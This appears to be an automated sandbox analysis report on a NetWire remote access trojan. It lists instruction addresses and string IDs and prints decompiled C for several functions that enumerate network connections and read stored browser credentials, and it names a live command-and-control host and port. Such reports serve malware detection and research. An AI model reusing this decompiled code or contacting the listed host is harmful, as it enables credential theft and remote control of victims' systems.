                                                          0x004087ed
                                                          0x004087f2
                                                          0x004087f7
                                                          0x004087f9
                                                          0x004087fb
                                                          0x00408802
                                                          0x00408807
                                                          0x0040881b
                                                          0x00408820
                                                          0x00408826
                                                          0x0040882e
                                                          0x00408836
                                                          0x0040883c
                                                          0x00408859
                                                          0x00408859
                                                          0x0040886f
                                                          0x0040886f
                                                          0x0040888e
                                                          0x00408895
                                                          0x0040889b
                                                          0x004088a2
                                                          0x004088a7
                                                          0x004088bb
                                                          0x004088c0
                                                          0x004088c6
                                                          0x004088ce
                                                          0x004088d1
                                                          0x004088d6
                                                          0x004088dc
                                                          0x004088e2
                                                          0x004088e9
                                                          0x004088ee
                                                          0x00408902
                                                          0x00408907
                                                          0x0040890d
                                                          0x00408915
                                                          0x0040891d
                                                          0x00408923
                                                          0x00408940
                                                          0x00408940
                                                          0x00408895
                                                          0x00408764
                                                          0x0040894f

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 001$=$=$@$InternetProxy$U4R-55sEd590WfZ_W0u0i$U4R-55sEd5Xj90WfZPWR84n_W0PQ00dR5u6d0$U4R-55sTsdR$h$h$http://www.yandex.com$p$p$socks=$t$t$t$t$winhttp.dll
                                                          • API String ID: 0-337019666
                                                          • Opcode ID: 5ae4fd168ad160b687ec016b66311f032f2127d997e6a72b6d5e7ab802d206c0
                                                          • Instruction ID: 129794d27e18b5d836c16bc2de0120feea3297db44a07732c008f05b0d4f5d07
                                                          • Opcode Fuzzy Hash: 5ae4fd168ad160b687ec016b66311f032f2127d997e6a72b6d5e7ab802d206c0
                                                          • Instruction Fuzzy Hash: 09D1F5B0508740AFD710EF25C68479ABBF0BF84744F418C2EE5C897351EBB99989CB5A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0041AC15, Relevance: 15.2, Strings: 12, Instructions: 218COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: )$A$D$D$G$H$I$I$N$P$R$T
                                                          • API String ID: 0-4026286603
                                                          • Opcode ID: f7e0d66e6706360943002546ce2ae5a522dee07f1adf161bc0e3ce1e523a7a0e
                                                          • Instruction ID: 7b50295ee95f3483ab7dff93a2a89c17451d79e52031df4d4eaf42e24e8d509c
                                                          • Opcode Fuzzy Hash: f7e0d66e6706360943002546ce2ae5a522dee07f1adf161bc0e3ce1e523a7a0e
                                                          • Instruction Fuzzy Hash: 14A1D27110D3809ED311DB69C48438FFFE1ABA6308F44895EE5C89B382D7B99989CB57
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040262F, Relevance: 11.5, Strings: 9, Instructions: 282COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 45%
                                                          			E0040262F(signed int __ecx, signed int __edx, intOrPtr _a4) {
				char _v608;
				char _v624;
				char _v868;
				char _v876;
				char _v916;
				intOrPtr _v936;
				signed short _v944;
				signed short _v948;
				intOrPtr _v964;
				intOrPtr _v968;
				signed short _v972;
				intOrPtr _v976;
				signed short _v980;
				char _v988;
				signed short _v996;
				signed short _v1000;
				signed short _v1004;
				signed short _v1008;
				signed int _v1010;
				signed short _v1012;
				signed short _v1014;
				intOrPtr _v1016;
				signed int _v1018;
				char* _v1020;
				signed short _v1022;
				signed short _v1024;
				signed short _v1028;
				signed short _v1032;
				signed short _v1036;
				signed int _v1040;
				signed int _v1048;
				signed short _v1052;
				signed short _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				char _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				intOrPtr _t139;
				intOrPtr _t140;
				intOrPtr _t141;
				intOrPtr* _t144;
				signed short _t147;
				void* _t150;
				void* _t162;
				void* _t163;
				signed short _t164;
				void* _t165;
				signed short _t168;
				void* _t169;
				signed int _t170;
				signed int _t179;
				signed short _t182;
				void* _t183;
				signed short _t186;
				void* _t187;
				signed int _t188;
				void* _t192;
				signed int _t193;
				signed int _t206;
				intOrPtr* _t211;
				signed int _t213;
				signed int _t214;
				signed int _t216;
				signed int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t223;
				signed int _t231;
				signed short* _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed int _t236;
				signed short* _t237;
				signed short* _t238;
				void* _t239;
				signed int* _t240;

				_t223 = __edx;
				_t220 = __ecx;
				_t237 =  &_v1004;
				E0041236C( &_v944,  &_v944, 0x8000);
				_t139 = E00407F7A(_t223, "iphlpapi.dll");
				_v1020 = "psapi.dll";
				_v976 = _t139;
				_t140 = E00407F7A(_t223);
				_v1020 = "kernel32.dll";
				_v968 = _t140;
				_t141 = E00407F7A(_t223);
				_v1020 = "Ed5jf5dRSdSqYsqCVid";
				_v964 = _t141;
				_t144 = E00407F8E(_t223, _v976, E004081AA());
				_v1020 = "Ed5jf5dRSdSuSsqCVid";
				_t211 = _t144;
				_t147 = E00407F8E(_t223, _v976, E004081AA());
				_v1020 = "Ed590WYd66XlCnd_4idLCldD";
				_v972 = _t147;
				_t150 = E00407F8E(_t223, _v968, E004081AA());
				if(_t150 == 0) {
					_t150 = E00407F8E(_t223, _v964, E004081AA("Ed590WYd66XlCnd_4idLCldD"));
				}
				_t224 = _t223 & 0xffffff00 | _t211 == 0x00000000;
				_t222 = _t220 & 0xffffff00 | _v972 == 0x00000000 | _t223 & 0xffffff00 | _t211 == 0x00000000;
				if((_t220 & 0xffffff00 | _v972 == 0x00000000 | _t223 & 0xffffff00 | _t211 == 0x00000000) != 0 || _t150 == 0) {
					L24:
					_t212 =  &_v944;
					if(_v936 == 0) {
						_v1008 = 0;
						_v1012 = 0;
						_v1016 = 0xe5;
					} else {
						_v1008 = E00412540( &_v944);
						_v1016 = 0xe4;
						_v1012 = _v944;
					}
					E00405D7D(_t224, _a4);
					E004123B1(_t212);
					E00407FAB(_v976);
					E00407FAB(_v968);
					return E00407FAB(_v964);
				} else {
					_t232 =  &_v948;
					_v948 = 0;
					_v1000 = 0;
					_v1004 = 5;
					_v1008 = 2;
					_v1012 = 1;
					_v1016 = _t232;
					_v1020 = 0;
					_t162 =  *_t211();
					_t238 = _t237 - 0x18;
					if(_t162 != 0x7a) {
						L14:
						_t213 =  &_v972;
						_v972 = 0;
						_v1024 = 0;
						_v1028 = 1;
						_v1032 = 2;
						_v1036 = 1;
						_v1040 = _t213;
						 *_t238 = 0;
						_t163 = _v996();
						_t239 = _t238 - 0x18;
						if(_t163 != 0x7a) {
							goto L24;
						}
						_t164 = _v996;
						_v1068 = _t164;
						L0041F714();
						_v1000 = _t164;
						if(_t164 == 0) {
							goto L24;
						}
						_v1048 = 0;
						_v1052 = 1;
						_v1056 = 2;
						_v1060 = 1;
						_v1064 = _t213;
						_v1068 = _t164;
						_t165 = _v1020();
						_t240 = _t239 - 0x18;
						if(_t165 != 0) {
							L22:
							if(_v1024 != 0) {
								E00407F59( &_v1024);
							}
							goto L24;
						}
						_t233 = 0;
						_t235 =  &_v876;
						while(1) {
							_t168 = _v1024;
							if(_t233 >=  *_t168) {
								goto L22;
							}
							_t214 = _t233 * 0xc;
							_t169 = _t168 + _t214;
							_t170 =  *(_t169 + 8) & 0x0000ffff;
							_v1092 = _t170;
							L0041F914();
							_v1096 =  *((intOrPtr*)(_t169 + 4));
							_v1048 = _t170;
							L0041F924();
							_v1088 = _t170;
							_v1092 = 0x422c01;
							_v1096 = 0x40;
							_v1084 = _v1052 & 0x0000ffff;
							 *_t240 =  &_v1012;
							E004127A8();
							_v1092 = 0x104;
							_v1096 = _t235;
							 *_t240 =  *(_v1032 + _t214 + 0xc);
							E00402570(_t222, _t224, __eflags, _t222, _t224);
							_v1080 =  &_v1012;
							_t216 =  &_v624;
							_v1088 = _t235;
							_v1092 = 0x422c07;
							_v1096 = 0x204;
							 *_t240 = _t216;
							_v1084 =  *((intOrPtr*)(_t214 + _v1032 + 0xc));
							_t179 = E004127A8();
							__eflags = _t179;
							if(_t179 > 0) {
								_v1092 = _t179;
								_v1096 = _t216;
								 *_t240 =  &_v1024;
								E00412458( &_v1024, _t224);
							}
							_t233 = _t233 + 1;
							__eflags = _t233;
						}
						goto L22;
					}
					_t182 = _v972;
					 *_t238 = _t182;
					L0041F714();
					_v980 = _t182;
					if(_t182 == 0) {
						goto L24;
					}
					_v1024 = 0;
					_v1028 = 5;
					_v1032 = 2;
					_v1036 = 1;
					_v1040 = _t232;
					 *_t238 = _t182;
					_t183 =  *_t211();
					_t238 = _t238 - 0x18;
					if(_t183 != 0) {
						L12:
						if(_v1004 != 0) {
							E00407F59( &_v1004);
						}
						goto L14;
					}
					_t234 = 0;
					_t236 =  &_v916;
					while(1) {
						_t186 = _v1004;
						if(_t234 >=  *_t186) {
							goto L12;
						}
						_t217 = _t234 * 0x18;
						_t187 = _t186 + _t217;
						_t188 =  *(_t187 + 0xc) & 0x0000ffff;
						_v1068 = _t188;
						L0041F914();
						_v1072 =  *((intOrPtr*)(_t187 + 8));
						_v1010 = _t188;
						L0041F924();
						_v1064 = _t188;
						_v1068 = "%s:%u";
						_v1072 = 0x40;
						_v1060 = _v1014 & 0x0000ffff;
						_v1076 =  &_v988;
						E004127A8();
						_t192 = _v1012 + _t217;
						_t193 =  *(_t192 + 0x14) & 0x0000ffff;
						_v1076 = _t193;
						L0041F914();
						_v1080 =  *((intOrPtr*)(_t192 + 0x10));
						_v1018 = _t193;
						L0041F924();
						_v1072 = _t193;
						_v1076 = "%s:%u";
						_v1080 = 0x40;
						_v1084 = _t236;
						_v1068 = _v1022 & 0x0000ffff;
						_t231 =  &_v868;
						E004127A8(_t222, _t224, _t222, _t224);
						_v1076 = 0x104;
						E00402570(_t222, _t224, __eflags, ( &(_v1020[_t217]))[0x18], _t231);
						_v1056 = E004081AA( *((intOrPtr*)(0x422ca0 + ( &(_v1020[_t217]))[4] * 4)));
						_v1060 = _t236;
						_v1064 =  &_v996;
						_t219 =  &_v608;
						_v1072 = _t231;
						_v1076 = 0x422bed;
						_v1080 = 0x204;
						_v1084 = _t219;
						_v1068 = ( &(_v1020[_t217]))[0x18];
						_t206 = E004127A8();
						__eflags = _t206;
						if(_t206 > 0) {
							E00412458( &_v1008, _t224,  &_v1008, _t219, _t206);
						}
						_t234 = _t234 + 1;
						__eflags = _t234;
					}
					goto L12;
				}
			}






















































































                                                          0x0040262f
                                                          0x0040262f
                                                          0x00402633
                                                          0x00402648
                                                          0x00402654
                                                          0x00402659
                                                          0x00402660
                                                          0x00402664
                                                          0x00402669
                                                          0x00402670
                                                          0x00402674
                                                          0x00402679
                                                          0x00402680
                                                          0x00402694
                                                          0x00402699
                                                          0x004026a0
                                                          0x004026b2
                                                          0x004026b7
                                                          0x004026be
                                                          0x004026d2
                                                          0x004026d9
                                                          0x004026f2
                                                          0x004026f2
                                                          0x00402701
                                                          0x00402704
                                                          0x00402706
                                                          0x00402a74
                                                          0x00402a79
                                                          0x00402a7d
                                                          0x00402a9d
                                                          0x00402aa5
                                                          0x00402aad
                                                          0x00402a7f
                                                          0x00402a87
                                                          0x00402a8f
                                                          0x00402a97
                                                          0x00402a97
                                                          0x00402abf
                                                          0x00402ac7
                                                          0x00402ad3
                                                          0x00402adf
                                                          0x00402afa
                                                          0x00402714
                                                          0x00402714
                                                          0x00402718
                                                          0x00402720
                                                          0x00402728
                                                          0x00402730
                                                          0x00402738
                                                          0x00402740
                                                          0x00402744
                                                          0x0040274b
                                                          0x0040274d
                                                          0x00402753
                                                          0x004028fa
                                                          0x004028fa
                                                          0x004028fe
                                                          0x00402906
                                                          0x0040290e
                                                          0x00402916
                                                          0x0040291e
                                                          0x00402926
                                                          0x0040292a
                                                          0x00402931
                                                          0x00402935
                                                          0x0040293b
                                                          0x00000000
                                                          0x00000000
                                                          0x00402941
                                                          0x00402945
                                                          0x00402948
                                                          0x0040294f
                                                          0x00402953
                                                          0x00000000
                                                          0x00000000
                                                          0x00402959
                                                          0x00402961
                                                          0x00402969
                                                          0x00402971
                                                          0x00402979
                                                          0x0040297d
                                                          0x00402980
                                                          0x00402984
                                                          0x00402989
                                                          0x00402a61
                                                          0x00402a66
                                                          0x00402a6f
                                                          0x00402a6f
                                                          0x00000000
                                                          0x00402a66
                                                          0x0040298f
                                                          0x00402991
                                                          0x00402a55
                                                          0x00402a55
                                                          0x00402a5b
                                                          0x00000000
                                                          0x00000000
                                                          0x0040299d
                                                          0x004029a0
                                                          0x004029a5
                                                          0x004029a9
                                                          0x004029ac
                                                          0x004029b2
                                                          0x004029b5
                                                          0x004029ba
                                                          0x004029c5
                                                          0x004029cd
                                                          0x004029d5
                                                          0x004029dd
                                                          0x004029e1
                                                          0x004029e4
                                                          0x004029ed
                                                          0x004029f5
                                                          0x004029fe
                                                          0x00402a01
                                                          0x00402a0e
                                                          0x00402a15
                                                          0x00402a1c
                                                          0x00402a20
                                                          0x00402a28
                                                          0x00402a30
                                                          0x00402a33
                                                          0x00402a37
                                                          0x00402a3c
                                                          0x00402a3e
                                                          0x00402a40
                                                          0x00402a48
                                                          0x00402a4c
                                                          0x00402a4f
                                                          0x00402a4f
                                                          0x00402a54
                                                          0x00402a54
                                                          0x00402a54
                                                          0x00000000
                                                          0x00402a55
                                                          0x00402759
                                                          0x0040275d
                                                          0x00402760
                                                          0x00402767
                                                          0x0040276b
                                                          0x00000000
                                                          0x00000000
                                                          0x00402771
                                                          0x00402779
                                                          0x00402781
                                                          0x00402789
                                                          0x00402791
                                                          0x00402795
                                                          0x00402798
                                                          0x0040279a
                                                          0x0040279f
                                                          0x004028e7
                                                          0x004028ec
                                                          0x004028f5
                                                          0x004028f5
                                                          0x00000000
                                                          0x004028ec
                                                          0x004027a5
                                                          0x004027a7
                                                          0x004028db
                                                          0x004028db
                                                          0x004028e1
                                                          0x00000000
                                                          0x00000000
                                                          0x004027b3
                                                          0x004027b6
                                                          0x004027bb
                                                          0x004027bf
                                                          0x004027c2
                                                          0x004027c8
                                                          0x004027cb
                                                          0x004027d0
                                                          0x004027db
                                                          0x004027e3
                                                          0x004027eb
                                                          0x004027f3
                                                          0x004027f7
                                                          0x004027fa
                                                          0x00402803
                                                          0x00402808
                                                          0x0040280c
                                                          0x0040280f
                                                          0x00402815
                                                          0x00402818
                                                          0x0040281d
                                                          0x00402828
                                                          0x0040282c
                                                          0x00402834
                                                          0x0040283c
                                                          0x0040283f
                                                          0x00402843
                                                          0x0040284a
                                                          0x00402853
                                                          0x00402867
                                                          0x00402888
                                                          0x00402890
                                                          0x00402894
                                                          0x0040289b
                                                          0x004028a2
                                                          0x004028a6
                                                          0x004028ae
                                                          0x004028b6
                                                          0x004028b9
                                                          0x004028bd
                                                          0x004028c2
                                                          0x004028c4
                                                          0x004028d5
                                                          0x004028d5
                                                          0x004028da
                                                          0x004028da
                                                          0x004028da
                                                          0x00000000
                                                          0x004028db

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %s:%d$%s:%u$@$Ed590WYd66XlCnd_4idLCldD$Ed5jf5dRSdSqYsqCVid$Ed5jf5dRSdSuSsqCVid$iphlpapi.dll$kernel32.dll$psapi.dll
                                                          • API String ID: 0-1859760768
                                                          • Opcode ID: ecfa040b99fdd072a25a0974f1507886e54ec2cabcd5e23ee5df752222c6d893
                                                          • Instruction ID: 64c6eb304da1bd60933a222d55b1bae016526deff2b752f498ff56c04a6099ea
                                                          • Opcode Fuzzy Hash: ecfa040b99fdd072a25a0974f1507886e54ec2cabcd5e23ee5df752222c6d893
                                                          • Instruction Fuzzy Hash: 28D1A3B4908341ABC710AF65C58965EFBF0BF84748F418C2EF8C897291D7B9D988CB56
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00408E7F, Relevance: 10.1, Strings: 8, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $ $ $%Rand%$HostId$HostId-GqOyO6$Install Date$SOFTWARE\NetWire
                                                          • API String ID: 0-1518357408
                                                          • Opcode ID: 8d9fa1ce1227cd48d07afd670ca600cc309de693e6a65e3e096cff891438ab6d
                                                          • Instruction ID: 4d253b419a98ff4c59b7894da0d5b96d3c68cf9a0106b0f9d5c8600cdd8dc3cd
                                                          • Opcode Fuzzy Hash: 8d9fa1ce1227cd48d07afd670ca600cc309de693e6a65e3e096cff891438ab6d
                                                          • Instruction Fuzzy Hash: BE3193B0109311ABD700AF11D68929FBBE1AF80748F51CC1EE5D85B256D7FE8588CB9B
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040D745, Relevance: 9.0, Strings: 7, Instructions: 232COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $/$A$E$K$Software\Microsoft\Internet Explorer\IntelliForms\Storage2$rb+
                                                          • API String ID: 0-417429986
                                                          • Opcode ID: 17987caa90f594d4a55626d029de0f9e4765c5bc8f064db7406c04733c776cae
                                                          • Instruction ID: b3a366508a3bf55356eea0268f728a85e1b25c4e3c11778993a5dcbc8714eb01
                                                          • Opcode Fuzzy Hash: 17987caa90f594d4a55626d029de0f9e4765c5bc8f064db7406c04733c776cae
                                                          • Instruction Fuzzy Hash: B2A1C2B09083419BD710EFA5C18465BBBE0AF85358F00882EF5D897391D7B9D989DF4A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00401421, Relevance: 8.9, Strings: 7, Instructions: 101COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %$%$%s\%s.%s$TEMP$\$s$s
                                                          • API String ID: 0-3075679649
                                                          • Opcode ID: 89cb20cf2dea8ad77aae30bef6cdbecb0b37b5e693641a521aedb572dfca6291
                                                          • Instruction ID: f04d716bfdf1a3b2f19b14ba05fef692e22545d8b3c1490e52eb58049ae1adaa
                                                          • Opcode Fuzzy Hash: 89cb20cf2dea8ad77aae30bef6cdbecb0b37b5e693641a521aedb572dfca6291
                                                          • Instruction Fuzzy Hash: 435196B040C385DEE720EF25D54879EBBE0BF84348F408D2EE5D887281E7B99588DB56
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00408B1A, Relevance: 8.8, Strings: 7, Instructions: 58COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: &$000$001$075$HostId-GqOyO6$Password$podzeye.duckdns.org:6688;
                                                          • API String ID: 0-718410314
                                                          • Opcode ID: 35587c5c701385df943a746cf7bb302fd0de4502a5840f6354f21f0f9562dd1c
                                                          • Instruction ID: d012676997c43d0a4f60e6223c36ad427c2154accf07b5176cb32dd979716e27
                                                          • Opcode Fuzzy Hash: 35587c5c701385df943a746cf7bb302fd0de4502a5840f6354f21f0f9562dd1c
                                                          • Instruction Fuzzy Hash: 3E3100B0109711AAD300EF56D2D925EBEE0BF84748F91CC2EE1C94B251C7F985C99B97
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040DCE9, Relevance: 7.9, Strings: 6, Instructions: 395COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 15%
                                                          			E0040DCE9(signed int __edx, void* _a4) {
				intOrPtr* _v52;
				char _v488;
				char _v492;
				char _v684;
				char _v908;
				char _v1032;
				char _v1036;
				void _v1068;
				void _v1084;
				void _v1092;
				void _v1096;
				void _v1100;
				void _v1104;
				void _v1108;
				char _v1132;
				char _v1136;
				char _v1148;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				intOrPtr _v1172;
				intOrPtr _v1176;
				char* _v1180;
				signed int _v1188;
				intOrPtr* _v1196;
				intOrPtr _v1204;
				signed int _v1212;
				signed int _v1220;
				char* _v1224;
				void _v1228;
				void _v1232;
				void _v1236;
				signed char _v1240;
				void* _v1244;
				signed char _v1248;
				intOrPtr _v1252;
				void _v1256;
				void _v1264;
				void _v1268;
				signed char _v1272;
				char* _v1276;
				signed char _v1280;
				intOrPtr _v1284;
				void _v1288;
				void _v1296;
				char* _v1300;
				signed char _v1304;
				char* _v1308;
				signed char _v1312;
				intOrPtr _v1316;
				void _v1320;
				void _v1324;
				void _v1328;
				void* _v1332;
				void _v1336;
				void _v1340;
				char _v1344;
				char _v1348;
				signed char _v1352;
				signed char _v1356;
				void _v1360;
				signed char _v1364;
				signed char _v1368;
				void _v1372;
				signed char _v1376;
				void _v1380;
				void _v1384;
				signed char _v1396;
				signed char _v1400;
				char* _v1404;
				char* _v1408;
				char* _v1412;
				char _v1416;
				char* _t211;
				char* _t212;
				intOrPtr* _t213;
				void* _t214;
				intOrPtr* _t215;
				char _t216;
				void* _t217;
				signed int _t218;
				void _t224;
				void* _t229;
				void* _t233;
				void* _t250;
				char* _t251;
				intOrPtr _t257;
				void* _t278;
				void _t279;
				signed char _t285;
				void* _t288;
				intOrPtr* _t289;
				char* _t290;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t298;
				signed char _t299;
				void _t301;
				signed char _t303;
				intOrPtr* _t310;
				signed char _t311;
				intOrPtr _t312;
				signed char _t313;
				char* _t316;
				void* _t317;
				char* _t318;
				signed char _t319;
				char _t320;
				void* _t321;
				char** _t324;
				void* _t326;
				void* _t329;

				_t295 = __edx;
				_v1108 = 0;
				 *(memcpy( &_v1084, 0x4228a0, 4 << 2)) = 0;
				_v1104 = 0;
				_v1100 = 0;
				_v1096 = 0;
				_v1092 = 0;
				memcpy( &_v1068, 0x4228b0, 4 << 2);
				_t324 = _t321 - 0x48c + 0x18;
				_t211 = E004081AA("2CQi5Yi4.Sii");
				_v1180 = _t211;
				L0041F55C();
				_t316 = _t211;
				_t212 = 0;
				_push(_t288);
				if(_t316 == 0) {
					L38:
					return _t212;
				}
				 *_t324 = "zCQi5TsdRzCQi5";
				_t213 = E004081AA();
				 *_t324 = _t316;
				_v1180 = _t213;
				L0041F5AC();
				_push(_t295);
				_t310 = _t213;
				 *_t324 = "zCQi5PiW6dzCQi5";
				_t214 = E004081AA(_t295);
				 *_t324 = _t316;
				_v1188 = _t214;
				L0041F5AC();
				_push(0);
				 *_t324 = "zCQi5jRQld0C5dX5dl6";
				_v1148 = _t214;
				_t215 = E004081AA(0);
				 *_t324 = _t316;
				_v1196 = _t215;
				L0041F5AC();
				_push(_t288);
				_t289 = _t215;
				 *_t324 = "zCQi5Ed5X5dl";
				_t216 = E004081AA(_t288);
				 *_t324 = _t316;
				_v1204 = _t216;
				L0041F5AC();
				_push(_t317);
				 *_t324 = "zCQi5Ed5X5dl";
				_v1160 = _t216;
				_t217 = E004081AA(_t317);
				 *_t324 = _t316;
				_v1212 = _t217;
				L0041F5AC();
				_push(_t295);
				_v1224 = "zCQi5_0dd";
				_v1164 = _t217;
				_t218 = E004081AA(_t295);
				_v1224 = _t316;
				_v1220 = _t218;
				L0041F5AC();
				_push(0);
				_push(0);
				_t296 = _t295 & 0xffffff00 | _t310 == 0x00000000;
				_v1188 = _t218;
				_t297 = _t296 & 0xffffff00 | _v1180 == 0x00000000;
				_t298 = _t297 & 0xffffff00 | _v1176 == 0x00000000;
				_t299 = _t298 & 0xffffff00 | _v1172 == 0x00000000;
				if((_t218 & 0xffffff00 | _t289 == 0x00000000 | _t296 | _t297 | _t298 | _t299) != 0 || _v1188 == 0) {
					L3:
					_t290 = 0;
					goto L33;
				} else {
					_v1228 = 0;
					_v1224 =  &_v1156;
					_v1232 =  &_v1136;
					_t229 =  *_t310();
					_t324 = _t324 - 0xc;
					if(_t229 != 0) {
						goto L3;
					}
					_v1240 = 0x200;
					_v1232 =  &_v1160;
					_v1236 =  &_v1164;
					_v1244 = _v1168;
					_t233 =  *_t289();
					_t324 = _t324 - 0x10;
					if(_t233 != 0 || _v1180 == 0) {
						goto L3;
					} else {
						if(E004132E6(0, _t299) != 0xa) {
							if(E004132E6(0, _t299) == 0xc || E004132E6(0, _t299) == 0xb || E004132E6(0, _t299) == 0xe || E004132E6(0, _t299) == 0xd || E004132E6(0, _t299) == 0xf) {
								goto L8;
							} else {
								_v1212 = 0;
								_t290 = 0;
								while(_v1212 < _v1180) {
									_v1252 = 0x10;
									_t299 = _v1212 * 0x34 + _v1176;
									_v1256 =  &_v1148;
									 *_t324 = _t299;
									_t313 = _t299;
									if(E004129C0() == 0) {
										_v1232 = 0;
										_v1236 = 0;
										_v1240 = 0x100;
										_v1248 = 0xffffffff;
										_v1244 =  &_v1132;
										_v1256 = 0;
										 *_t324 = 0;
										_v1252 =  *((intOrPtr*)(_t313 + 0x10));
										L0041F4DC();
										_t329 = _t324 - 0x20;
										_v1264 = 0;
										_v1268 = 0;
										_v1272 = 0x100;
										_v1280 = 0xffffffff;
										_v1276 =  &_v908;
										_v1288 = 0;
										 *_t329 = 0;
										_v1284 =  *((intOrPtr*)(_t313 + 0x14)) + 0x20;
										L0041F4DC();
										_t319 =  &_v684;
										_v1296 = 0;
										_v1300 = 0;
										_v1304 = 0x100;
										_v1312 = 0xffffffff;
										_v1308 = _t319;
										_v1320 = 0;
										_v1324 = 0;
										_v1316 =  *((intOrPtr*)(_t313 + 0x18)) + 0x20;
										L0041F4DC();
										_v1336 = 0;
										_v1340 = 0;
										_v1268 = 0;
										_v1332 =  &_v1268;
										_v1344 =  *((intOrPtr*)(_t313 + 0x18));
										_v1352 = _t313;
										_v1348 =  *((intOrPtr*)(_t313 + 0x14));
										_v1356 = _v1280;
										_t278 = _v1300();
										_t324 = _t329 - 0xffffffffffffffe4;
										if(_t278 == 0) {
											_t303 =  &_v488;
											_v1356 = 0;
											_v1360 = 0;
											_v1364 = 0x100;
											_v1368 = _t303;
											_v1372 = 0xffffffff;
											_v1380 = 0;
											_v1384 = 0;
											_v1324 = _t303;
											_v1376 =  *((intOrPtr*)(_v1296 + 0x1c)) + 0x20;
											L0041F4DC();
											_t324 = _t324 - 0x20;
											_t299 = _v1356;
											_v1400 = _t319;
											_t320 =  &_v1324;
											_v1408 = 2;
											_v1412 = 0x4239a1;
											_v1404 =  &_v1032;
											_v1324 = 0;
											_v1396 = _t299;
											_v1416 = _t320;
											_t285 = E00412755( &_v1032);
											_t313 = _t285;
											if(_t285 != 0xffffffff) {
												_v1404 = _t285;
												_v1412 = _t290;
												_v1400 = 1;
												_v1408 = _t320;
												_t290 = _t290 + _t313;
												_v1416 =  &_v1344;
												_v1344 = E00412ABF(0);
											}
										}
										_t279 = _v1296;
										if(_t279 != 0) {
											_v1384 = _t279;
											_v1340();
											_push(_t313);
										}
									}
									_v1336 =  &(1[_v1336]);
								}
								L33:
								_t224 = _v1148;
								if(_t224 != 0) {
									_v1232 = _t224;
									_t224 = _v1188();
									_push(0);
								}
								if(_v1156 != 0) {
									_v1232 =  &_v1156;
									_t224 = _v1180();
									_push(_t299);
								}
								_v1232 = _t316;
								L0041F614();
								_push(_t224);
								 *_v52 = _t290;
								_t212 = _v1164;
								goto L38;
							}
						}
						L8:
						_v1212 = 0;
						_t290 = 0;
						while(_v1212 < _v1180) {
							_v1252 = 0x10;
							_t299 = _v1212 * 0x38 + _v1176;
							_v1256 =  &_v1148;
							 *_t324 = _t299;
							_t311 = _t299;
							if(E004129C0() == 0) {
								_v1232 = 0;
								_v1236 = 0;
								_v1240 = 0x100;
								_v1248 = 0xffffffff;
								_v1244 =  &_v1132;
								_v1256 = 0;
								 *_t324 = 0;
								_v1252 =  *((intOrPtr*)(_t311 + 0x10));
								L0041F4DC();
								_t326 = _t324 - 0x20;
								_v1264 = 0;
								_v1268 = 0;
								_v1272 = 0x100;
								_v1280 = 0xffffffff;
								_v1276 =  &_v908;
								_v1288 = 0;
								 *_t326 = 0;
								_v1284 =  *((intOrPtr*)(_t311 + 0x14)) + 0x20;
								L0041F4DC();
								_t318 =  &_v684;
								_v1296 = 0;
								_v1300 = 0;
